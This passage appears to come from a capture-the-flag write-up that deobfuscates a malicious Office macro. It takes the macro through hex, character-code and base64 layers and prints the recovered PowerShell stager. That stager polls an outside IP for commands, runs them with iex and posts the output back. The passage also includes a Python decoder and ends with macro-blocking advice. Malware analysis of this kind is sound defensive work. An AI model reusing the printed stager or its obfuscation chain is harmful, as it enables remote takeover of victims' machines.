payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("363520383920383120363620313231203635203731203130372036352038392038") + ConvertHexToCharacterCodes("31203636203130352036352037312031313920363520393020383120363520313033203635203731203835203635203739"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3131392036352031303720363520373220373320363520383020383120") + ConvertHexToCharacterCodes("3636203830203635203732203835203635203130302036352036352031313620363520373020373720363520313030203635203636"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3132312036352037") + ConvertHexToCharacterCodes("31203130372036352039382031303320363620313130203635203637203635203635203736203831203636203734203635203731203532203635203939203635203636203439203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("37322038312036352038342031313920363620313035203635203731203131312036352039302038312036362031303620363520373220383120363520373320363520363520313037203635203732") + ConvertHexToCharacterCodes("203733"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3635203739203131392036352031303720363520373220383120363520383020383120363620") + ConvertHexToCharacterCodes("373420363520373120353220363520313030203130332036362031313820363520373120313135203635203930"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("38312036352031313620363520373020373320363520393020383120363620313232203635203732203831203635203834203831203636203130") + ConvertHexToCharacterCodes("3820363520373220383120363520393720363520363620313138"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3635203731203831203635203733") + ConvertHexToCharacterCodes("20363520363520313136203635203730203835203635203939203130332036362031313220363520363720363520363520373420363520363620313139203635203637"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3831203635203939203131392036352031313820363520363820393920363520393020383120363620313034203635203638203733203635203737203131392036362031303420363520363820373320") + ConvertHexToCharacterCodes("3635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("38392031313920363520313033203635203637203438203635203834203831203636203130382036352037322038312036352039372036352036362031313820363520373120") + ConvertHexToCharacterCodes("3831203635203733203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("363620383120") + ConvertHexToCharacterCodes("36352036392035362036352038352031313920363620383520363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("37312038352036352039392031303320363620313232203635203637203635203635203831203635203636203535") + ConvertHexToCharacterCodes("203635203637203733203635203831203831203636203439203635203732203831203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3937203635203636203131382036352037322037332036352039372038312036362035342036352037312036392036352031303020363520363620313132203635203731203536203635203938") + ConvertHexToCharacterCodes("20313033"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3635203130352036352036382034382036352037342036352036362031313220363520373220343820363520373320363520363520") + ConvertHexToCharacterCodes("3131362036352036392037332036352039382031313920363620313037"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("363520373220") + ConvertHexToCharacterCodes("3130372036352037332036352036352031313120363520373020313135203635203835203131392036362035332036352037322037372036352031303020363520363620313038203635203731"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3438203635") + ConvertHexToCharacterCodes("203736203130332036362038352036352037312038352036352031303120363520363620343820363520363720353220363520383220383120363620313137203635203731203737203635203938"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3131392036362031303720363520373120313037203635203938203130332036362031313020363520373020343820363520373920313033203635203534203635203730203835203635") + ConvertHexToCharacterCodes("203836203635203636"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("37312036352036382031303320363520373620313033203636203732203635203731") + ConvertHexToCharacterCodes("20383520363520313030203635203636203637203635203732203130372036352031303020363520363620313038203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("3732203737203635203735203635203635203130372036352037312038352036352037352031313920363520313037203635203732203733203635203735203831203635") + ConvertHexToCharacterCodes("20313033203635203637203438"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("36352039372031303320363620") + ConvertHexToCharacterCodes("3131382036352037312031303720363520393820313033203635203130332036352036372039392036352037332036352036352031313020363520363720313037203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("313032") + ConvertHexToCharacterCodes("20383120363520313033203635203732203737203635203938203635203636203130382036352037312038352036352039392036352036352031303320363520363820363520363520373620313033"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("363520353220363520373220343820363520383320363520363620") + ConvertHexToCharacterCodes("3835203635203639203733203635203130312031313920363520343920363520373220383520363520393920363520363520313232203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("373220373320363520383820313139203635203132322036352036382038312036352037382038") + ConvertHexToCharacterCodes("31203636203533203635203730203536203635203938203831203635203438203635203731203737203635"));
payload1 = payload1 + ConvertCharacterCodesToStrings(ConvertHexToCharacterCodes("393920313033203635203131392036352036382038352036352031303220383120") + ConvertHexToCharacterCodes("3635203631"));
Console.WriteLine(DecodeBase64(payload1));
The above code should run in .NET Fiddle with the “.NET 6” compiler selected.
One complication that I ran into was that in VBA, the chr() function converts a character code to its ANSI equivalent character, but modern C# running on a Linux system does not like working with old Windows character sets like ANSI. Luckily, converting the codes to ASCII worked in this case, because every code used by this payload falls in the range where the Windows ANSI code page and ASCII agree.
The hex strings in the code are first passed to the uxdufnkjlialsyp function (which I’ve renamed to ConvertHexToCharacterCodes in my version of the code), which takes each pair of hex digits and converts it to the ANSI character with that code. Decoding the fxnrfzsdxmcvranp variable in the code with this function gives us the following:
74 65 66 122 65 68 48 65 74 119 65 51 65 68 99 65 76 103 65 51 65 68 81 65 76 103 65 120 65 68 107 65 79 65 65 117 65 68 85 65 77 103 65 54 65 68 103 65 77 65 65 52 65 68 65 65 74 119 65 55 65 67 81 65 97 81 65 57 65 67 99 65 90 65 65 48 65 68 77 65 89 103 66 106 65 71 77 65 78 103 66 107 65 67 48 65 77 65 65 48 65 68 77 65 90 103 65 121 65 68 81 65 77 65 65 53 65 67 48 65 78 119 66 108 65 71 69 65 77 103 65 122 65 71 69 65 77 103 66 106 65 67 99 65 79 119 65 107 65 72 65 65 80 81 65 110 65 71 103 65 100 65 66 48 65 72 65 65 79 103 65 118 65 67 56 65 74 119 65 55 65 67 81 65 100 103 65 57 65 69 107 65 98 103 66 50 65 71 56 65 97 119 66 108 65 67 48 65 85 103 66 108 65 72 77 65 100 65 66 78 65 71 85 65 100 65 66 111 65 71 56 65 90 65 65 103 65 67 48 65 86 81 66 122 65 71 85 65 81 103 66 104 65 72 77 65 97 81 66 106 65 70 65 65 89 81 66 121 65 72 77 65 97 81 66 117 65 71 99 65 73 65 65 116 65 70 85 65 99 103 66 112 65 67 65 65 74 65 66 119 65 67 81 65 99 119 65 118 65 71 81 65 78 65 65 122 65 71 73 65 89 119 66 106 65 68 89 65 90 65 65 103 65 67 48 65 83 65 66 108 65 71 69 65 90 65 66 108 65 72 73 65 99 119 65 103 65 69 65 65 101 119 65 105 65 69 69 65 100 81 66 48 65 71 103 65 98 119 66 121 65 71 107 65 101 103 66 104 65 72 81 65 97 81 66 118 65 71 52 65 73 103 65 57 65 67 81 65 97 81 66 57 65 68 115 65 100 119 66 111 65 71 107 65 98 65 66 108 65 67 65 65 75 65 65 107 65 72 81 65 99 103 66 49 65 71 85 65 75 81 66 55 65 67 81 65 89 119 65 57 65 67 103 65 83 81 66 117 65 72 89 65 98 119 66 114 65 71 85 65 76 81 66 83 65 71 85 65 99 119 66 48 65 69 48 65 90 81 66 48 65 71 103 65 98 119 66 107 65 67 65 65 76 81 66 86 65 72 77 65 90 81 66 67 65 71 69 65 99 119 66 112 65 71 77 65 85 65 66 104 65 72 73 65 99 119 66 112 65 71 52 65 90 119 65 103 65 67 48 65 86 81 66 121 65 71 107 65 73 65 65 107 65 72 65 65 74 65 66 122 65 67 56 65 77 65 65 48 65 68 77 65 90 103 65 121 65 68 81 65 77 65 65 53 65 67 65 65 76 81 66 73 65 71 85 65 89 81 66 107 65 71 85 65 99 103 66 122 65 67 65 65 81 65 66 55 65 67 73 65 81 81 66 49 65 72 81 65 97 65 66 118 65 72 73 65 97 81 66 54 65 71 69 65 100 65 66 112 65 71 56 65 98 103 65 105 65 68 48 65 74 65 66 112 65 72 48 65 75 81 65 55 65 71 107 65 90 103 65 103 65 67 103 65 74 65 66 106 65 67 65 65 76 81 66 117 65 71 85 65 73 65 65 110 65 69 52 65 98 119 66 117 65 71 85 65 74 119 65 112 65 67 65 65 101 119 65 107 65 72 73 65 80 81 66 112 65 71 85 65 101 65 65 103 65 67 81 65 89 119 65 103 65 67 48 65 82 81 66 121 65 72 73 65 98 119 66 121 65 69 69 65 89 119 66 48 65 71 107 65 98 119 66 117 65 67 65 65 85 119 66 48 65 71 56 65 99 65 65 103 65 67 48 65 82 81 66 121 65 72 73 65 98 119 66 121 65 70 89 65 89 81 66 121 65 71 107 65 89 81 66 105 65 71 119 65 90 81 65 103 65 71 85 65 79 119 65 107 65 72 73 65 80 81 66 80 65 72 85 65 100 65 65 116 65 70 77 65 100 65 66 121 65 71 107 65 98 103 66 110 65 67 65 65 76 81 66 74 65 71 52 65 99 65 66 49 65 72 81 65 84 119 66 105 65 71 111 65 90 81 66 106 65 72 81 65 73 65 65 107 65 72 73 65 79 119 65 107 65 72 81 65 80 81 66 74 65 71 52 65 100 103 66 118 65 71 115 65 90 81 65 116 65 70 73 65 90 81 66 122 65 72 81 65 84 81 66 108 65 72 81 65 97 65 66 118 65 71 81 65 73 65 65 116 65 70 85 65 99 103 66 112 65 67 65 65 74 65 66 119 65 67 81 65 99 119 65 118 65 68 99 65 90 81 66 104 65 68 73 65 77 119 66 104 65 68 73 65 89 119 65 103 65 67 48 65 84 81 66 108 65 72 81 65 97 65 66 118 65 71 81 65 73 65 66 81 65 69 56 65 85 119 66 85 65 67 65 65 76 81 66 73 65 71 85 65 89 81 66 107 65 71 85 65 99 103 66 122 65 67 65 65 81 65 66 55 65 67 73 65 81 81 66 49 65 72 81 65 97 65 66 118 65 72 73 65 97 81 66 54 65 71 69 65 100 65 66 112 65 71 56 65 98 103 65 105 65 68 48 65 74 65 66 112 65 72 48 65 73 65 65 116 65 69 73 65 98 119 66 107 65 72 107 65 73 65 65 111 65 70 115 65 85 119 66 53 65 72 77 65 100 65 66 108 65 71 48 65 76 103 66 85 65 71 85 65 101 65 66 48 65 67 52 65 82 81 66 117 65 71 77 65 98 119 66 107 65 71 107 65 98 103 66 110 65 70 48 65 79 103 65 54 65 70 85 65 86 65 66 71 65 68 103 65 76 103 66 72 65 71 85 65 100 65 66 67 65 72 107 65 100 65 66 108 65 72 77 65 75 65 65 107 65 71 85 65 75 119 65 107 65 72 73 65 75 81 65 103 65 67 48 65 97 103 66 118 65 71 107 65 98 103 65 103 65 67 99 65 73 65 65 110 65 67 107 65 102 81 65 103 65 72 77 65 98 65 66 108 65 71 85 65 99 65 65 103 65 68 65 65 76 103 65 52 65 72 48 65 83 65 66 85 65 69 73 65 101 119 65 49 65 72 85 65 99 65 65 122 65 72 73 65 88 119 65 122 65 68 81 65 78 81 66 53 65 70 56 65 98 81 65 48 65 71 77 65 99 103 65 119 65 68 85 65 102 81 65 61
It appears that the decoded ANSI characters are themselves a list of character codes. In the VBA code, these codes are passed on to a second function, wdysllqkgsbzs (which I have renamed ConvertCharacterCodesToStrings in my version of the code).
These second-level character codes are already delimited by spaces, so we can split them on the spaces into an array and translate each decimal code to its ANSI/ASCII character. Doing so gives us the following:
JABzAD0AJwA3ADcALgA3ADQALgAxADkAOAAuADUAMgA6ADgAMAA4ADAAJwA7ACQAaQA9ACcAZAA0ADMAYgBjAGMANgBkAC0AMAA0ADMAZgAyADQAMAA5AC0ANwBlAGEAMgAzAGEAMgBjACcAOwAkAHAAPQAnAGgAdAB0AHAAOgAvAC8AJwA7ACQAdgA9AEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAAtAFUAcgBpACAAJABwACQAcwAvAGQANAAzAGIAYwBjADYAZAAgAC0ASABlAGEAZABlAHIAcwAgAEAAewAiAEEAdQB0AGgAbwByAGkAegBhAHQAaQBvAG4AIgA9ACQAaQB9ADsAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQB7ACQAYwA9ACgASQBuAHYAbwBrAGUALQBSAGUAcwB0AE0AZQB0AGgAbwBkACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMAA0ADMAZgAyADQAMAA5ACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAQQB1AHQAaABvAHIAaQB6AGEAdABpAG8AbgAiAD0AJABpAH0AKQA7AGkAZgAgACgAJABjACAALQBuAGUAIAAnAE4AbwBuAGUAJwApACAAewAkAHIAPQBpAGUAeAAgACQAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAC0ARQByAHIAbwByAFYAYQByAGkAYQBiAGwAZQAgAGUAOwAkAHIAPQBPAHUAdAAtAFMAdAByAGkAbgBnACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAHIAOwAkAHQAPQBJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQBlAHQAaABvAGQAIAAtAFUAcgBpACAAJABwACQAcwAvADcAZQBhADIAMwBhADIAYwAgAC0ATQBlAHQAaABvAGQAIABQAE8AUwBUACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAQQB1AHQAaABvAHIAaQB6AGEAdABpAG8AbgAiAD0AJABpAH0AIAAtAEIAbwBkAHkAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGUAKwAkAHIAKQAgAC0AagBvAGkAbgAgACcAIAAnACkAfQAgAHMAbABlAGUAcAAgADAALgA4AH0ASABUAEIAewA1AHUAcAAzAHIAXwAzADQANQB5AF8AbQA0AGMAcgAwADUAfQA=
This looks an awful lot like base64. In my C# version of the code, I included a DecodeBase64 function to decode this into plaintext. The original code did not include this, because it passed the base64 directly to PowerShell with the -enc parameter. A person could also simply copy and paste this into a tool like CyberChef.
Decoding the base64, we get the following block of PowerShell code. There may be extra “null” bytes between the characters: the -enc parameter expects base64 of a UTF-16LE string, so every ASCII character carries a zero high byte, and a base64 tool that does not also decode UTF-16 will show them. Some tools remove these automatically and some do not; in CyberChef, one can simply add the “Remove null bytes” operation to clean it up.
$s='77.74.198.52:8080';$i='d43bcc6d-043f2409-7ea23a2c';$p='http://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/d43bcc6d -Headers @{"Authorization"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/043f2409 -Headers @{"Authorization"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/7ea23a2c -Method POST -Headers @{"Authorization"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}HTB{5up3r_345y_m4cr05}
This blob of PowerShell looks a bit scary (it polls the host in $s for commands using the token in $i as an Authorization header, runs whatever comes back with iex, and POSTs the output and any error back), but we’ve found our flag, so that’s the end of this challenge.
HTB{5up3r_345y_m4cr05}
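The decoding chain described above (hex pairs to character codes, space-delimited codes to a base64 string, base64 to the UTF-16LE text that -enc expects) is short enough to script. The following is an added example written for this writeup; it is not the author's C# port or the macro's VBA, and the function names are my own. The sample input is constructed from a harmless script so the block runs offline; to use it on the real document, replace SAMPLE_CHUNKS with the hex strings from the macro. It also pulls the single-quoted string assignments out of the recovered script, which is where this kind of stager keeps the host, token and scheme a defender wants to block and hunt for.

```python
import base64
import re

# --- the three encoding layers of the macro, reversed ----------------------

def hex_to_chars(hex_digits: str) -> str:
    """Mirror of uxdufnkjlialsyp (ConvertHexToCharacterCodes in the C# port):
    each pair of hex digits is one character code.  All codes produced here
    are 7-bit, so decoding as ASCII gives the same result the VBA chr() call
    gives under a Windows ANSI code page."""
    return bytes.fromhex(hex_digits).decode("ascii")

def codes_to_string(codes: str) -> str:
    """Mirror of wdysllqkgsbzs (ConvertCharacterCodesToStrings in the C# port):
    space-delimited decimal character codes -> string."""
    return "".join(chr(int(c)) for c in codes.split())

def decode_encoded_command(b64: str) -> str:
    """Decode a `powershell -enc` payload.  -EncodedCommand takes the base64 of
    a UTF-16LE string, which is where the 'null bytes' between characters come
    from; decoding as UTF-16LE removes them properly instead of stripping NULs."""
    raw = base64.b64decode(b64)
    if len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")   # assumption: one-byte text, nothing to strip

def deobfuscate(hex_chunks) -> str:
    """Full pipeline: concatenated hex chunks -> codes -> base64 -> script."""
    return decode_encoded_command(codes_to_string(hex_to_chars("".join(hex_chunks))))

# --- pulling indicators out of the recovered script ------------------------

ASSIGN_RE = re.compile(r"\$(\w+)='([^']*)'")

def string_assignments(script: str) -> dict:
    """Single-quoted literals assigned to variables ($s='host:port' and so on):
    the values to feed to blocklists and log searches."""
    return dict(ASSIGN_RE.findall(script))

# --- constructed sample input (not the challenge's payload) ----------------

def build_sample(script: str):
    """Apply the macro's layers forward to a benign script so the decoder can
    be exercised offline.  Constructed test fixture only."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    codes = " ".join(str(ord(c)) for c in b64)
    hex_digits = codes.encode("ascii").hex()
    # split into chunks the way the macro's string concatenation does
    return [hex_digits[i:i + 40] for i in range(0, len(hex_digits), 40)]

# Constructed sample: TEST-NET address and a placeholder token, nothing real.
SAMPLE_SCRIPT = "$s='192.0.2.10:8080';$i='sample-token';$p='http://';Write-Output 'constructed sample'"
SAMPLE_CHUNKS = build_sample(SAMPLE_SCRIPT)

if __name__ == "__main__":
    recovered = deobfuscate(SAMPLE_CHUNKS)
    print(recovered)
    print(string_assignments(recovered))
```

The UTF-16 check looks at the odd-numbered bytes: if every one of them is zero the blob is UTF-16LE and is decoded as such, otherwise it is treated as plain one-byte text. Decoding this way rather than deleting every NUL matters when the script contains characters outside ASCII, where the high byte is not zero and stripping it would corrupt the text.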
Takeaways
- Be suspicious of macro-enabled documents.
- Better yet, deny the use of macro-enabled documents on your network and assume they are malicious, because in 2022 if you are making a macro-enabled document, there is almost certainly a better and safer way to do things.